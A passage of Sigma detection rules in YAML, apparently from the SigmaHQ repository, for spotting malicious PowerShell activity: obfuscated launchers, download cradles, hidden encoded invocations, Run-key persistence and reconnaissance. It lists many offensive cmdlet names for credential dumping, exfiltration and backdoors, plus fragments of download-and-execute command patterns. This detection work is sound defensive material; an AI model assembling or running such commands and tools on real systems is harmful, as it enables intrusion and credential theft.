    "content": "title: Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell Module\nid: f3c89218-8c3d-4ba9-9974-f1d8e6a1b4a6\nrelated:\n    - id: e54f5149-6ba3-49cf-b153-070d24679126\n      type: derived\nstatus: test\ndescription: Detects Obfuscated Powershell via VAR++ LAUNCHER\nreferences:\n    - https://github.com/SigmaHQ/sigma/issues/1009 # (Task27)\nauthor: Timur Zinniatullin, oscd.community\ndate: 2020-10-13\nmodified: 2024-04-05\ntags:\n    - attack.defense-evasion\n    - attack.t1027\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    category: ps_module\n    definition: 0ad03ef1-f21b-4a79-8ce8-e6900c54b65b\ndetection:\n    selection_4103:\n        Payload|re: '(?i)&&set.*(\\{\\d\\}){2,}\\\\\"\\s+?-f.*&&.*cmd.*/c' # FPs with |\\/r\n    condition: selection_4103\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/powershell/powershell_module/posh_pm_malicious_commandlets.yml",
    "content": "title: Malicious PowerShell Commandlets - PoshModule\nid: 7d0d0329-0ef1-4e84-a9f5-49500f9d7c6c\nrelated:\n    - id: 89819aa4-bbd6-46bc-88ec-c7f7fe30efa6\n      type: similar\n    - id: 02030f2f-6199-49ec-b258-ea71b07e03dc\n      type: similar\nstatus: test\ndescription: Detects Commandlet names from well-known PowerShell exploitation frameworks\nreferences:\n    - https://adsecurity.org/?p=2921\n    - https://github.com/S3cur3Th1sSh1t/PowerSharpPack/tree/master/PowerSharpBinaries\n    - https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1\n    - https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1\n    - https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1\n    - https://github.com/dafthack/DomainPasswordSpray/blob/b13d64a5834694aa73fd2aea9911a83027c465a7/DomainPasswordSpray.ps1\n    - https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/ # Invoke-TotalExec\n    - https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/ # Invoke-TotalExec\n    - https://github.com/calebstewart/CVE-2021-1675 # Invoke-Nightmare\n    - https://github.com/BloodHoundAD/BloodHound/blob/0927441f67161cc6dc08a53c63ceb8e333f55874/Collectors/AzureHound.ps1\n    - https://bloodhound.readthedocs.io/en/latest/data-collection/azurehound.html\n    - https://github.com/HarmJ0y/DAMP\n    - https://github.com/samratashok/nishang\n    - https://github.com/DarkCoderSc/PowerRunAsSystem/\n    - https://github.com/besimorhino/powercat\n    - https://github.com/Kevin-Robertson/Powermad\n    - https://github.com/adrecon/ADRecon\n    - https://github.com/adrecon/AzureADRecon\n    - https://github.com/sadshade/veeam-creds/blob/6010eaf31ba41011b58d6af3950cffbf6f5cea32/Veeam-Get-Creds.ps1\n    - https://github.com/The-Viper-One/Invoke-PowerDPAPI/\n    - https://github.com/Arno0x/DNSExfiltrator/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-01-20\nmodified: 2025-12-10\ntags:\n    - attack.execution\n    - attack.discovery\n    - attack.t1482\n    - attack.t1087\n    - attack.t1087.001\n    - attack.t1087.002\n    - attack.t1069.001\n    - attack.t1069.002\n    - attack.t1069\n    - attack.t1059.001\nlogsource:\n    product: windows\n    category: ps_module\n    definition: 0ad03ef1-f21b-4a79-8ce8-e6900c54b65b\ndetection:\n    selection:\n        Payload|contains:\n            # Note: Please ensure alphabetical order when adding new entries\n            - 'Add-Exfiltration'\n            - 'Add-Persistence'\n            - 'Add-RegBackdoor'\n            - 'Add-RemoteRegBackdoor'\n            - 'Add-ScrnSaveBackdoor'\n            - 'BadSuccessor'\n            - 'Check-VM'\n            - 'ConvertTo-Rc4ByteStream'\n            - 'Decrypt-Hash'\n            - 'Disable-ADIDNSNode'\n            - 'Disable-MachineAccount'\n            - 'Do-Exfiltration'\n            - 'Enable-ADIDNSNode'\n            - 'Enable-MachineAccount'\n            - 'Enabled-DuplicateToken'\n            - 'Exploit-Jboss'\n            - 'Export-ADR' # # ADRecon related cmdlets\n            - 'Export-ADRCSV' # # ADRecon related cmdlets\n            - 'Export-ADRExcel' # # ADRecon related cmdlets\n            - 'Export-ADRHTML' # # ADRecon related cmdlets\n            - 'Export-ADRJSON' # # ADRecon related cmdlets\n            - 'Export-ADRXML' # # ADRecon related cmdlets\n            - 'Find-Fruit'\n            - 'Find-GPOLocation'\n            - 'Find-TrustedDocuments'\n            - 'Get-ADIDNS' # Covers: Get-ADIDNSNodeAttribute, Get-ADIDNSNodeOwner, Get-ADIDNSNodeTombstoned, Get-ADIDNSPermission, Get-ADIDNSZone\n            - 'Get-ApplicationHost'\n            - 'Get-ChromeDump'\n            - 'Get-ClipboardContents'\n            - 'Get-FoxDump'\n            - 'Get-GPPPassword'\n            - 'Get-IndexedItem'\n            - 'Get-KerberosAESKey'\n            - 'Get-Keystrokes'\n            - 'Get-LSASecret'\n            - 'Get-MachineAccountAttribute'\n            - 'Get-MachineAccountCreator'\n            - 'Get-PassHashes'\n            - 'Get-RegAlwaysInstallElevated'\n            - 'Get-RegAutoLogon'\n            - 'Get-RemoteBootKey'\n            - 'Get-RemoteCachedCredential'\n            - 'Get-RemoteLocalAccountHash'\n            - 'Get-RemoteLSAKey'\n            - 'Get-RemoteMachineAccountHash'\n            - 'Get-RemoteNLKMKey'\n            - 'Get-RickAstley'\n            - 'Get-Screenshot'\n            - 'Get-SecurityPackages'\n            - 'Get-ServiceFilePermission'\n            - 'Get-ServicePermission'\n            - 'Get-ServiceUnquoted'\n            - 'Get-SiteListPassword'\n            - 'Get-System'\n            - 'Get-TimedScreenshot'\n            - 'Get-UnattendedInstallFile'\n            - 'Get-Unconstrained'\n            - 'Get-USBKeystrokes'\n            - 'Get-VaultCredential'\n            - 'Get-VulnAutoRun'\n            - 'Get-VulnSchTask'\n            - 'Grant-ADIDNSPermission'\n            - 'Gupt-Backdoor'\n            - 'HTTP-Login'\n            - 'Install-ServiceBinary'\n            - 'Install-SSP'\n            - 'Invoke-ACLScanner'\n            - 'Invoke-ADRecon' # # ADRecon related cmdlets\n            - 'Invoke-ADSBackdoor'\n            - 'Invoke-AgentSmith'\n            - 'Invoke-AllChecks'\n            - 'Invoke-ARPScan'\n            - 'Invoke-AzureHound'\n            - 'Invoke-BackdoorLNK'\n            - 'Invoke-BadPotato'\n            - 'Invoke-BetterSafetyKatz'\n            - 'Invoke-BypassUAC'\n            - 'Invoke-Carbuncle'\n            - 'Invoke-Certify'\n            - 'Invoke-ConPtyShell'\n            - 'Invoke-CredentialInjection'\n            - 'Invoke-DAFT'\n            - 'Invoke-DCSync'\n            - 'Invoke-DinvokeKatz'\n            - 'Invoke-DllInjection'\n            - 'Invoke-DNSUpdate'\n            - 'Invoke-DNSExfiltrator'\n            - 'Invoke-DomainPasswordSpray'\n            - 'Invoke-DowngradeAccount'\n            - 'Invoke-EgressCheck'\n            - 'Invoke-Eyewitness'\n            - 'Invoke-FakeLogonScreen'\n            - 'Invoke-Farmer'\n            - 'Invoke-Get-RBCD-Threaded'\n            - 'Invoke-Gopher'\n            - 'Invoke-Grouper' # Also Covers Invoke-GrouperX\n            - 'Invoke-HandleKatz'\n            - 'Invoke-ImpersonatedProcess'\n            - 'Invoke-ImpersonateSystem'\n            - 'Invoke-InteractiveSystemPowerShell'\n            - 'Invoke-Internalmonologue'\n            - 'Invoke-Inveigh'\n            - 'Invoke-InveighRelay'\n            - 'Invoke-KrbRelay'\n            - 'Invoke-LdapSignCheck'\n            - 'Invoke-Lockless'\n            - 'Invoke-MalSCCM'\n            - 'Invoke-Mimikatz'\n            - 'Invoke-Mimikittenz'\n            - 'Invoke-MITM6'\n            - 'Invoke-NanoDump'\n            - 'Invoke-NetRipper'\n            - 'Invoke-Nightmare'\n            - 'Invoke-NinjaCopy'\n            - 'Invoke-OfficeScrape'\n            - 'Invoke-OxidResolver'\n            - 'Invoke-P0wnedshell'\n            - 'Invoke-Paranoia'\n            - 'Invoke-PortScan'\n            - 'Invoke-PoshRatHttp' # Also Covers Invoke-PoshRatHttps\n            - 'Invoke-PostExfil'\n            - 'Invoke-PowerDump'\n            - 'Invoke-PowerDPAPI'\n            - 'Invoke-PowerShellTCP'\n            - 'Invoke-PowerShellWMI'\n            - 'Invoke-PPLDump'\n            - 'Invoke-PsExec'\n            - 'Invoke-PSInject'\n            - 'Invoke-PsUaCme'\n            - 'Invoke-ReflectivePEInjection'\n            - 'Invoke-ReverseDNSLookup'\n            - 'Invoke-Rubeus'\n            - 'Invoke-RunAs'\n            - 'Invoke-SafetyKatz'\n            - 'Invoke-SauronEye'\n            - 'Invoke-SCShell'\n            - 'Invoke-Seatbelt'\n            - 'Invoke-ServiceAbuse'\n            - 'Invoke-ShadowSpray'\n            - 'Invoke-Sharp' # Covers all \"Invoke-Sharp\" variants\n            - 'Invoke-Shellcode'\n            - 'Invoke-SMBScanner'\n            - 'Invoke-Snaffler'\n            - 'Invoke-Spoolsample'\n            - 'Invoke-SpraySinglePassword'\n            - 'Invoke-SSHCommand'\n            - 'Invoke-StandIn'\n            - 'Invoke-StickyNotesExtract'\n            - 'Invoke-SystemCommand'\n            - 'Invoke-Tasksbackdoor'\n            - 'Invoke-Tater'\n            - 'Invoke-Thunderfox'\n            - 'Invoke-ThunderStruck'\n            - 'Invoke-TokenManipulation'\n            - 'Invoke-Tokenvator'\n            - 'Invoke-TotalExec'\n            - 'Invoke-UrbanBishop'\n            - 'Invoke-UserHunter'\n            - 'Invoke-VoiceTroll'\n            - 'Invoke-Whisker'\n            - 'Invoke-WinEnum'\n            - 'Invoke-winPEAS'\n            - 'Invoke-WireTap'\n            - 'Invoke-WmiCommand'\n            - 'Invoke-WMIExec'\n            - 'Invoke-WScriptBypassUAC'\n            - 'Invoke-Zerologon'\n            - 'MailRaider'\n            - 'New-ADIDNSNode'\n            - 'New-DNSRecordArray'\n            - 'New-HoneyHash'\n            - 'New-InMemoryModule'\n            - 'New-MachineAccount'\n            - 'New-SOASerialNumberArray'\n            - 'Out-Minidump'\n            - 'Port-Scan'\n            - 'PowerBreach'\n            - 'powercat '\n            - 'PowerUp'\n            - 'PowerView'\n            - 'Remove-ADIDNSNode'\n            - 'Remove-MachineAccount'\n            - 'Remove-Update'\n            - 'Rename-ADIDNSNode'\n            - 'Revoke-ADIDNSPermission'\n            - 'Set-ADIDNSNode' # Covers: Set-ADIDNSNodeAttribute, Set-ADIDNSNodeOwner\n            - 'Set-MacAttribute'\n            - 'Set-MachineAccountAttribute'\n            - 'Set-Wallpaper'\n            - 'Show-TargetScreen'\n            - 'Start-CaptureServer'\n            - 'Start-Dnscat2'\n            - 'Start-WebcamRecorder'\n            - 'Veeam-Get-Creds'\n            - 'VolumeShadowCopyTools'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/powershell/powershell_module/posh_pm_remote_powershell_session.yml",
    "content": "title: Remote PowerShell Session (PS Module)\nid: 96b9f619-aa91-478f-bacb-c3e50f8df575\nstatus: test\ndescription: Detects remote PowerShell sessions\nreferences:\n    - https://threathunterplaybook.com/hunts/windows/190511-RemotePwshExecution/notebook.html\nauthor: Roberto Rodriguez @Cyb3rWard0g, Tim Shelton\ndate: 2019-08-10\nmodified: 2023-01-20\ntags:\n    - attack.execution\n    - attack.t1059.001\n    - attack.lateral-movement\n    - attack.t1021.006\nlogsource:\n    product: windows\n    category: ps_module\n    definition: 0ad03ef1-f21b-4a79-8ce8-e6900c54b65b\ndetection:\n    selection:\n        ContextInfo|contains|all:\n            - ' = ServerRemoteHost ' #  HostName: 'ServerRemoteHost'  french : Nom d’hôte =\n            - 'wsmprovhost.exe'      #  HostApplication|contains: 'wsmprovhost.exe' french  Application hôte =\n    filter_pwsh_archive:\n        ContextInfo|contains: '\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\Microsoft.PowerShell.Archive.psm1'\n    condition: selection and not 1 of filter_*\nfalsepositives:\n    - Legitimate use remote PowerShell sessions\nlevel: high\n"
  },
  {
    "path": "rules/windows/powershell/powershell_module/posh_pm_remotefxvgpudisablement_abuse.yml",
    "content": "title: Potential RemoteFXvGPUDisablement.EXE Abuse - PowerShell Module\nid: 38a7625e-b2cb-485d-b83d-aff137d859f4\nrelated:\n    - id: a6fc3c46-23b8-4996-9ea2-573f4c4d88c5 # ProcCreation\n      type: similar\n    - id: f65e22f9-819e-4f96-9c7b-498364ae7a25 # PS Classic\n      type: similar\n    - id: cacef8fc-9d3d-41f7-956d-455c6e881bc5 # PS ScriptBlock\n      type: similar\nstatus: test\ndescription: Detects PowerShell module creation where the module Contents are set to \"function Get-VMRemoteFXPhysicalVideoAdapter\". This could be a sign of potential abuse of the \"RemoteFXvGPUDisablement.exe\" binary which is known to be vulnerable to module load-order hijacking.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md\n    - https://github.com/redcanaryco/AtomicTestHarnesses/blob/7e1e4da116801e3d6fcc6bedb207064577e40572/TestHarnesses/T1218_SignedBinaryProxyExecution/InvokeRemoteFXvGPUDisablementCommand.ps1\nauthor: Nasreddine Bencherchali (Nextron Systems), frack113\ndate: 2021-07-13\nmodified: 2023-05-09\ntags:\n    - attack.defense-evasion\n    - attack.t1218\nlogsource:\n    product: windows\n    category: ps_module\n    definition: 0ad03ef1-f21b-4a79-8ce8-e6900c54b65b\ndetection:\n    selection:\n        Payload|contains: 'ModuleContents=function Get-VMRemoteFXPhysicalVideoAdapter {'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/powershell/powershell_module/posh_pm_susp_ad_group_reco.yml",
    "content": "title: AD Groups Or Users Enumeration Using PowerShell - PoshModule\nid: 815bfc17-7fc6-4908-a55e-2f37b98cedb4\nstatus: test\ndescription: |\n    Adversaries may attempt to find domain-level groups and permission settings.\n    The knowledge of domain-level permission groups can help adversaries determine which groups exist and which users belong to a particular group.\n    Adversaries may use this information to determine which users have elevated permissions, such as domain administrators.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.002/T1069.002.md\nauthor: frack113\ndate: 2021-12-15\nmodified: 2023-01-20\ntags:\n    - attack.discovery\n    - attack.t1069.001\nlogsource:\n    product: windows\n    category: ps_module\n    definition: 0ad03ef1-f21b-4a79-8ce8-e6900c54b65b\ndetection:\n    selection_ad_principal:\n        - Payload|contains: 'get-ADPrincipalGroupMembership'\n        - ContextInfo|contains: 'get-ADPrincipalGroupMembership'\n    selection_get_aduser:\n        - Payload|contains|all:\n              - get-aduser\n              - '-f '\n              - '-pr '\n              - DoesNotRequirePreAuth\n        - ContextInfo|contains|all:\n              - get-aduser\n              - '-f '\n              - '-pr '\n              - DoesNotRequirePreAuth\n    condition: 1 of selection_*\nfalsepositives:\n    - Administrator script\nlevel: low\n"
  },
  {
    "path": "rules/windows/powershell/powershell_module/posh_pm_susp_download.yml",
    "content": "title: Suspicious PowerShell Download - PoshModule\nid: de41232e-12e8-49fa-86bc-c05c7e722df9\nrelated:\n    - id: 65531a81-a694-4e31-ae04-f8ba5bc33759\n      type: derived\nstatus: test\ndescription: Detects suspicious PowerShell download command\nreferences:\n    - https://learn.microsoft.com/en-us/dotnet/api/system.net.webclient.downloadfile?view=net-8.0\n    - https://learn.microsoft.com/en-us/dotnet/api/system.net.webclient.downloadstring?view=net-8.0\nauthor: Florian Roth (Nextron Systems)\ndate: 2017-03-05\nmodified: 2023-01-20\ntags:\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    category: ps_module\n    definition: 0ad03ef1-f21b-4a79-8ce8-e6900c54b65b\ndetection:\n    selection_webclient_:\n        ContextInfo|contains: 'System.Net.WebClient'\n    selection_function:\n        ContextInfo|contains:\n            - '.DownloadFile('\n            - '.DownloadString('\n    condition: all of selection_*\nfalsepositives:\n    - PowerShell scripts that download content from the Internet\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_module/posh_pm_susp_get_nettcpconnection.yml",
    "content": "title: Use Get-NetTCPConnection - PowerShell Module\nid: aff815cc-e400-4bf0-a47a-5d8a2407d4e1\nstatus: test\ndescription: Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1049/T1049.md#atomic-test-2---system-network-connections-discovery-with-powershell\nauthor: frack113\ndate: 2021-12-10\nmodified: 2022-12-02\ntags:\n    - attack.discovery\n    - attack.t1049\nlogsource:\n    product: windows\n    category: ps_module\n    definition: 0ad03ef1-f21b-4a79-8ce8-e6900c54b65b\ndetection:\n    selection:\n        ContextInfo|contains: 'Get-NetTCPConnection'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: low\n"
  },
  {
    "path": "rules/windows/powershell/powershell_module/posh_pm_susp_invocation_generic.yml",
    "content": "title: Suspicious PowerShell Invocations - Generic - PowerShell Module\nid: bbb80e91-5746-4fbe-8898-122e2cafdbf4\nrelated:\n    - id: 3d304fda-78aa-43ed-975c-d740798a49c1\n      type: derived\n    - id: ed965133-513f-41d9-a441-e38076a0798f\n      type: similar\nstatus: test\ndescription: Detects suspicious PowerShell invocation command parameters\nreferences:\n    - Internal Research\nauthor: Florian Roth (Nextron Systems)\ndate: 2017-03-12\nmodified: 2023-01-03\ntags:\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    category: ps_module\n    definition: 0ad03ef1-f21b-4a79-8ce8-e6900c54b65b\ndetection:\n    selection_encoded:\n        ContextInfo|contains:\n            - ' -enc '\n            - ' -EncodedCommand '\n            - ' -ec '\n    selection_hidden:\n        ContextInfo|contains:\n            - ' -w hidden '\n            - ' -window hidden '\n            - ' -windowstyle hidden '\n            - ' -w 1 '\n    selection_noninteractive:\n        ContextInfo|contains:\n            - ' -noni '\n            - ' -noninteractive '\n    condition: all of selection*\nfalsepositives:\n    - Very special / sneaky PowerShell scripts\nlevel: high\n"
  },
  {
    "path": "rules/windows/powershell/powershell_module/posh_pm_susp_invocation_specific.yml",
    "content": "title: Suspicious PowerShell Invocations - Specific - PowerShell Module\nid: 8ff28fdd-e2fa-4dfa-aeda-ef3d61c62090\nrelated:\n    - id: fce5f582-cc00-41e1-941a-c6fabf0fdb8c\n      type: obsolete\n    - id: ae7fbf8e-f3cb-49fd-8db4-5f3bed522c71\n      type: similar\n    - id: 536e2947-3729-478c-9903-745aaffe60d2\n      type: similar\nstatus: test\ndescription: Detects suspicious PowerShell invocation command parameters\nreferences:\n    - Internal Research\n    - https://github.com/HackTricks-wiki/hacktricks/blob/e4c7b21b8f36c97c35b7c622732b38a189ce18f7/src/windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries.md\nauthor: Florian Roth (Nextron Systems), Jonhnathan Ribeiro\ndate: 2017-03-05\nmodified: 2025-02-17\ntags:\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    category: ps_module\n    definition: 0ad03ef1-f21b-4a79-8ce8-e6900c54b65b\ndetection:\n    selection_convert_b64:\n        ContextInfo|contains|all:\n            - '-nop'\n            - ' -w '\n            - 'hidden'\n            - ' -c '\n            - '[Convert]::FromBase64String'\n    selection_iex:\n        ContextInfo|contains|all:\n            - ' -w '\n            - 'hidden'\n            - '-noni'\n            - '-nop'\n            - ' -c '\n            - 'iex'\n            - 'New-Object'\n    selection_enc:\n        ContextInfo|contains|all:\n            - ' -w '\n            - 'hidden'\n            - '-ep'\n            - 'bypass'\n            - '-Enc'\n    selection_reg:\n        ContextInfo|contains|all:\n            - 'powershell'\n            - 'reg'\n            - 'add'\n        ContextInfo|contains:\n            - '\\software\\microsoft\\windows\\currentversion\\run'\n            - '\\software\\wow6432node\\microsoft\\windows\\currentversion\\run'\n            - '\\software\\microsoft\\windows\\currentversion\\policies\\explorer\\run'\n    selection_webclient:\n        ContextInfo|contains|all:\n            - 'bypass'\n            - '-noprofile'\n            - '-windowstyle'\n            - 'hidden'\n            - 'new-object'\n            - 'system.net.webclient'\n            - '.download'\n    selection_iex_webclient:\n        ContextInfo|contains|all:\n            - 'iex'\n            - 'New-Object'\n            - 'Net.WebClient'\n            - '.Download'\n    filter_chocolatey:\n        ContextInfo|contains:\n            - \"(New-Object System.Net.WebClient).DownloadString('https://community.chocolatey.org/install.ps1\"\n            - 'Write-ChocolateyWarning'\n    condition: 1 of selection_* and not 1 of filter_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/powershell/powershell_module/posh_pm_susp_local_group_reco.yml",
    "content": "title: Suspicious Get Local Groups Information\nid: cef24b90-dddc-4ae1-a09a-8764872f69fc\nrelated:\n    - id: fa6a5a45-3ee2-4529-aa14-ee5edc9e29cb\n      type: similar\nstatus: test\ndescription: |\n    Detects the use of PowerShell modules and cmdlets to gather local group information.\n    Adversaries may use local system permission groups to determine which groups exist and which users belong to a particular group such as the local administrators group.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.001/T1069.001.md\nauthor: frack113\ndate: 2021-12-12\nmodified: 2025-08-22\ntags:\n    - attack.discovery\n    - attack.t1069.001\nlogsource:\n    product: windows\n    category: ps_module\n    definition: 0ad03ef1-f21b-4a79-8ce8-e6900c54b65b\ndetection:\n    selection_localgroup:\n        - Payload|contains:\n              - 'get-localgroup '\n              - 'get-localgroupmember '\n        - ContextInfo|contains:\n              - 'get-localgroup '\n              - 'get-localgroupmember '\n    selection_wmi_module:\n        - Payload|contains:\n              - 'get-wmiobject '\n              - 'gwmi '\n              - 'get-ciminstance '\n              - 'gcim '\n        - ContextInfo|contains|all:\n              - 'get-wmiobject '\n              - 'gwmi '\n              - 'get-ciminstance '\n              - 'gcim '\n    selection_wmi_class:\n        - Payload|contains: 'win32_group'\n        - ContextInfo|contains: 'win32_group'\n    condition: selection_localgroup or all of selection_wmi_*\nfalsepositives:\n    - Administrator script\nlevel: low\n"
  },
  {
    "path": "rules/windows/powershell/powershell_module/posh_pm_susp_reset_computermachinepassword.yml",
    "content": "title: Suspicious Computer Machine Password by PowerShell\nid: e3818659-5016-4811-a73c-dde4679169d2\nstatus: test\ndescription: |\n    The Reset-ComputerMachinePassword cmdlet changes the computer account password that the computers use to authenticate to the domain controllers in the domain.\n    You can use it to reset the password of the local computer.\nreferences:\n    - https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/reset-computermachinepassword?view=powershell-5.1\n    - https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/\nauthor: frack113\ndate: 2022-02-21\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.initial-access\n    - attack.t1078\nlogsource:\n    product: windows\n    category: ps_module\n    definition: 0ad03ef1-f21b-4a79-8ce8-e6900c54b65b\ndetection:\n    selection:\n        ContextInfo|contains: 'Reset-ComputerMachinePassword'\n    condition: selection\nfalsepositives:\n    - Administrator PowerShell scripts\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_module/posh_pm_susp_smb_share_reco.yml",
    "content": "title: Suspicious Get Information for SMB Share - PowerShell Module\nid: 6942bd25-5970-40ab-af49-944247103358\nstatus: test\ndescription: |\n    Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and\n    to identify potential systems of interest for Lateral Movement.\n    Networks often contain shared network drives and folders that enable users to access file directories on various systems across a network.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.002/T1069.002.md\nauthor: frack113\ndate: 2021-12-15\nmodified: 2022-12-02\ntags:\n    - attack.discovery\n    - attack.t1069.001\nlogsource:\n    product: windows\n    category: ps_module\n    definition: 0ad03ef1-f21b-4a79-8ce8-e6900c54b65b\ndetection:\n    selection:\n        - Payload|contains: get-smbshare\n        - ContextInfo|contains: get-smbshare\n    condition: selection\nfalsepositives:\n    - Administrator script\nlevel: low\n"
  },
  {
    "path": "rules/windows/powershell/powershell_module/posh_pm_susp_zip_compress.yml",
    "content": "title: Zip A Folder With PowerShell For Staging In Temp  - PowerShell Module\nid: daf7eb81-35fd-410d-9d7a-657837e602bb # PowerShell Module\nrelated:\n    - id: 71ff406e-b633-4989-96ec-bc49d825a412 # PowerShell Classic\n      type: similar\n    - id: b7a3c9a3-09ea-4934-8864-6a32cacd98d9 # PowerShell Script\n      type: similar\n    - id: 85a8e5ba-bd03-4bfb-bbfa-a4409a8f8b98 # Process Creation\n      type: similar\nstatus: test\ndescription: |\n    Detects PowerShell scripts that make use of the \"Compress-Archive\" Cmdlet in order to compress folders and files where the output is stored in a potentially suspicious location that is used often by malware for exfiltration.\n    An adversary might compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1074.001/T1074.001.md\n    - https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a\nauthor: Nasreddine Bencherchali (Nextron Systems), frack113\ndate: 2021-07-20\nmodified: 2023-12-18\ntags:\n    - attack.collection\n    - attack.t1074.001\nlogsource:\n    product: windows\n    category: ps_module\n    definition: 0ad03ef1-f21b-4a79-8ce8-e6900c54b65b\ndetection:\n    selection:\n        ContextInfo|contains|all:\n            - 'Compress-Archive -Path*-DestinationPath $env:TEMP'\n            - 'Compress-Archive -Path*-DestinationPath*\\AppData\\Local\\Temp\\'\n            - 'Compress-Archive -Path*-DestinationPath*:\\Windows\\Temp\\'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_module/posh_pm_syncappvpublishingserver_exe.yml",
    "content": "title: SyncAppvPublishingServer Bypass Powershell Restriction - PS Module\nid: fe5ce7eb-dad8-467c-84a9-31ec23bd644a\nrelated:\n    - id: fde7929d-8beb-4a4c-b922-be9974671667\n      type: derived\n    - id: 9f7aa113-9da6-4a8d-907c-5f1a4b908299\n      type: derived\nstatus: test\ndescription: Detects SyncAppvPublishingServer process execution which usually utilized by adversaries to bypass PowerShell execution restrictions.\nreferences:\n    - https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/\nauthor: 'Ensar Şamil, @sblmsrsn, OSCD Community'\ndate: 2020-10-05\nmodified: 2022-12-02\ntags:\n    - attack.defense-evasion\n    - attack.t1218\nlogsource:\n    product: windows\n    category: ps_module\n    definition: 0ad03ef1-f21b-4a79-8ce8-e6900c54b65b\ndetection:\n    selection:\n        ContextInfo|contains: 'SyncAppvPublishingServer.exe'\n    condition: selection\nfalsepositives:\n    - App-V clients\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_aadinternals_cmdlets_execution.yml",
    "content": "title: AADInternals PowerShell Cmdlets Execution - PsScript\nid: 91e69562-2426-42ce-a647-711b8152ced6\nrelated:\n    - id: c86500e9-a645-4680-98d7-f882c70c1ea3\n      type: similar\nstatus: test\ndescription: Detects ADDInternals Cmdlet execution. A tool for administering Azure AD and Office 365. Which can be abused by threat actors to attack Azure AD or Office 365.\nreferences:\n    - https://o365blog.com/aadinternals/\n    - https://github.com/Gerenios/AADInternals\nauthor: Austin Songer (@austinsonger), Nasreddine Bencherchali (Nextron Systems), Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2022-12-23\nmodified: 2025-02-06\ntags:\n    - attack.execution\n    - attack.reconnaissance\n    - attack.discovery\n    - attack.credential-access\n    - attack.impact\nlogsource:\n    product: windows\n    category: ps_script\n    definition: Script Block Logging must be enable\ndetection:\n    selection:\n        ScriptBlockText|contains:\n            # Since most of the cmdlets use a unique enough string which is \"-AADInt\" we only used that portion. For a complete list please check the references linked above\n            - 'Add-AADInt'\n            - 'ConvertTo-AADInt'\n            - 'Disable-AADInt'\n            - 'Enable-AADInt'\n            - 'Export-AADInt'\n            - 'Find-AADInt'\n            - 'Get-AADInt'\n            - 'Grant-AADInt'\n            - 'Initialize-AADInt'\n            - 'Install-AADInt'\n            - 'Invoke-AADInt'\n            - 'Join-AADInt'\n            - 'New-AADInt'\n            - 'Open-AADInt'\n            - 'Read-AADInt'\n            - 'Register-AADInt'\n            - 'Remove-AADInt'\n            - 'Reset-AADInt'\n            - 'Resolve-AADInt'\n            - 'Restore-AADInt'\n            - 'Save-AADInt'\n            - 'Search-AADInt'\n            - 'Send-AADInt'\n            - 'Set-AADInt'\n            - 'Start-AADInt'\n            - 'Unprotect-AADInt'\n            - 'Update-AADInt'\n    condition: selection\nfalsepositives:\n    - Legitimate use of the library for administrative activity\nlevel: high\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_access_to_browser_login_data.yml",
